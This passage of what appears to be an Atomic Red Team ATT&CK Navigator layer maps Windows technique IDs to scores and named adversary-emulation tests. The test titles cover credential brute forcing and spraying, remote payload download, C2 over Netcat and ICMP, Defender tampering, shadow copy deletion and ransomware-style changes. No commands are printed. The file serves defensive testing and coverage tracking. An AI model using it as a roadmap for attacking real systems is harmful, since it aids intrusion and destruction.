Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":60,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":76,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":2,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS 